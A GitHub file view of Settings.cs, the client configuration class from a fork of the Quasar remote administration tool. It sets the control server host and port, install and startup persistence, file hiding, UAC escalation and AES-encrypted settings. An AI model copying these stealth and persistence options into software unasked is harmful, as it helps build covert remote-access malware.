forked from quasar/Quasar
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathSettings.cs
executable file
·59 lines (55 loc) · 2.2 KB
/
Settings.cs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
using System;
#if !DEBUG
using xClient.Core.Encryption;
#endif
namespace xClient.Config
{
public static class Settings
{
#if DEBUG
public static string VERSION = "1.0.0.0d";
public static string HOST = "localhost";
public static ushort PORT = 4782;
public static int RECONNECTDELAY = 5000;
public static string PASSWORD = "1234";
public static string DIR = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
public static string SUBFOLDER = "Test";
public static string INSTALLNAME = "test.exe";
public static bool INSTALL = false;
public static bool STARTUP = false;
public static string MUTEX = "123AKs82kA,ylAo2kAlUS2kYkala!";
public static string STARTUPKEY = "Test key";
public static bool HIDEFILE = false;
public static bool ENABLEUACESCALATION = false;
public static void Initialize()
{
}
#else
public static string VERSION = "1.0.0.0r";
public static string HOST = "localhost";
public static ushort PORT = 4782;
public static int RECONNECTDELAY = 5000;
public static string PASSWORD = "1234";
public static string DIR = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
public static string SUBFOLDER = "SUB";
public static string INSTALLNAME = "INSTALL";
public static bool INSTALL = false;
public static bool STARTUP = true;
public static string MUTEX = "MUTEX";
public static string STARTUPKEY = "STARTUP";
public static bool HIDEFILE = true;
public static bool ENABLEUACESCALATION = true;
public static string ENCRYPTIONKEY = "ENCKEY";
public static void Initialize()
{
VERSION = AES.Decrypt(VERSION, ENCRYPTIONKEY);
HOST = AES.Decrypt(HOST, ENCRYPTIONKEY);
PASSWORD = AES.Decrypt(PASSWORD, ENCRYPTIONKEY);
SUBFOLDER = AES.Decrypt(SUBFOLDER, ENCRYPTIONKEY);
INSTALLNAME = AES.Decrypt(INSTALLNAME, ENCRYPTIONKEY);
MUTEX = AES.Decrypt(MUTEX, ENCRYPTIONKEY);
STARTUPKEY = AES.Decrypt(STARTUPKEY, ENCRYPTIONKEY);
}
#endif
}
}